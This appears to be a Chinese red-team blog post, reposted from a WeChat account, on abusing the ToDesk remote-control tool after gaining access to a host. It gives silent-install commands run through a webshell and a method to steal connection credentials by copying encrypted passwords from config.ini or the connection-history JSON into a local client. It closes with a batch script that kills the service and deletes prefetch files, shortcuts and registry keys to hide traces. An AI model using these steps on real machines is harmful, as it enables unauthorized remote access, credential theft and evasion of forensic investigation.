0x01简介

ToDesk 是一款多平台远程控制软件，支持主流操作系统Windows、Linux、Mac、Android、iOS跨平台协同操作。ToDesk支持任何网络环境下的远程实现，4.0版本已经开放100台设备列表。

0x02安装命令

静默安装

ToDesk_Setup.exe /S

设置安全密码

默认安装路径
C:Program Files (x86)ToDeskToDesk.exe

ToDesk.exe -setpasswd password
eg:ToDesk.exe -setpasswd 123456

查看运行状态

默认安装路径
C:Program Files (x86)ToDeskToDesk.exe

C:Program Files (x86)ToDeskToDesk.exe -status

0x03利用场景

未安装todesk

在冰蝎webshell管理工具中上传todesk安装包

静默安装

可以看到已经安装成功，但是依然会有弹窗（最好是管理员不在线情况下使用）

获取密码方式

1.设置安全密码

然后读取设备代码，即clientid，然后进行远程连接

2.读取临时密码

将其临时密码替换在本机上，重启todesk

可以看到本机的临时密码刷新了

进行远程连接

已安装了todesk

运行ToDesk后会在默认安装目录下生成一个config.ini配置文件，存储的有设备代码、临时密码、安全密码以及登录用户和密码等重要敏感信息。我们只需要找到todesk的根目录即可，然后查看config.ini，在config.ini可以找到识别码以及加密的密码，即clientid字段和tempAuthPassEx字段

[ConfigInfo]
screen_img=
localPort=35600
clientId=767****68
PrivateData=d88f1c6d9a29586481d1d18c97de14ec949c431dec2f382e0cd5f8d47dc486f287664ce1a060c888862dfade939d1d39a27b0b3fe4a83ea5e1
language=936
Version=4.2.9
tempAuthPassEx=77075794f6310ab54fee1e13935e5392771c24c418a6d526e3ab83ef578d215ebd87467876fd7f55312fb8dbbe9c478e35da8a3069a2
updatePassTime=20220512
Resolution=2560x1440
LastPushTimeEx=20220512
autoStart=0

对于加密的密码我们可以复制到本地的todesk配置文件里，替换我们本地的密码，然后重启todesk，这样就能得倒对方机器的连接密码

成功替换得到密码。

获取历史连接记录

ToDesk连接一台主机后会在默认安装目录下生成一个json格式文件，在已登录状态和未登录状态的文件命名方式不太一样。其中两种登陆状态的文件路径分别如下

C:Program Files (x86)ToDeskdevlist_******.json

C:Program Files (x86)ToDeskuserInfo.json

这个文件主要用于存储历史连接记录，只需找到UserId（设备代码）和PassEx密码，然后利用配置文件覆盖的方式将PassEx解密得到密码明文，最后再用目标主机ToDesk的设备代码和密码连接。

{
   "DeviceInfo" : [
      {
         "Height" : 723,
         "LastPath" : "",
         "PassEx" : "77075*******0ab54fee1e13935e5392771c24c418a6d526e3ab83ef578d215ebd87467876fd7f55312fb8dbbe9c478e35da8a3069a2",
         "PrivacyScreen" : 0,
         "Quality" : 0,
         "ResolutionX" : 0,
         "ResolutionY" : 0,
         "ScreenMode" : 0,
         "UserId" : "767***368",
         "Voice" : 0,
         "Width" : 1368
      }
   ]
}

无法获取密码情况

有时候不能设置安全密码，并且读取的出来的密码也不是正常的6位密码，我们可以直接kill todesk进程（先taskkill ToDesk_Service.exe所在进程）然后给目标机器修改config文件，替换成我们设置的密码，再重启todesk。

0x04清理痕迹

这里我们必须要先结束或停止ToDesk_Service进程/服务，否则ToDesk.exe进程会在结束后自动运行。

@echo off
taskkill /f /im ToDesk_Lite.exe /im ToDesk_Service.exe /im ToDesk.exe
del /s /q C:WindowsPrefetchTODESK*.pf
del /s /q C:UsersPublicDesktopToDesk.lnk
del /s /q "%userprofile%AppDataRoamingMicrosoftWindowsRecent*TODESK*.lnk"
rmdir /s /q "C:Program Files (x86)ToDesk"
rmdir /s /q "C:ProgramDataMicrosoftWindowsStart MenuProgramsToDesk"
rmdir /s /q "%userprofile%AppDataLocalToDesk"
rmdir /s /q "C:WINDOWSSysWOW64configsystemprofileAppDataLocalToDesk"
reg delete "HKLMSOFTWAREToDesk" /f
reg delete "HKLMSYSTEMCurrentControlSetServicesToDesk_Service" /f
reg delete "HKLMSOFTWAREWOW6432NodeMicrosoftWindowsCurrentVersionUninstallToDesk" /f
sc delete ToDesk_Service
[...SNIP...]

0x05总结

todesk只是作为一个简单的小工具，研究的目的是为了应对一些特殊的环境，而且缺点也有很多：需要管理员权限，目标机器锁屏需要密码，体积太大，容易被发现等问题。

原文始发于微信公众号（闪焰安全服务团队）：todesk在红队中的使用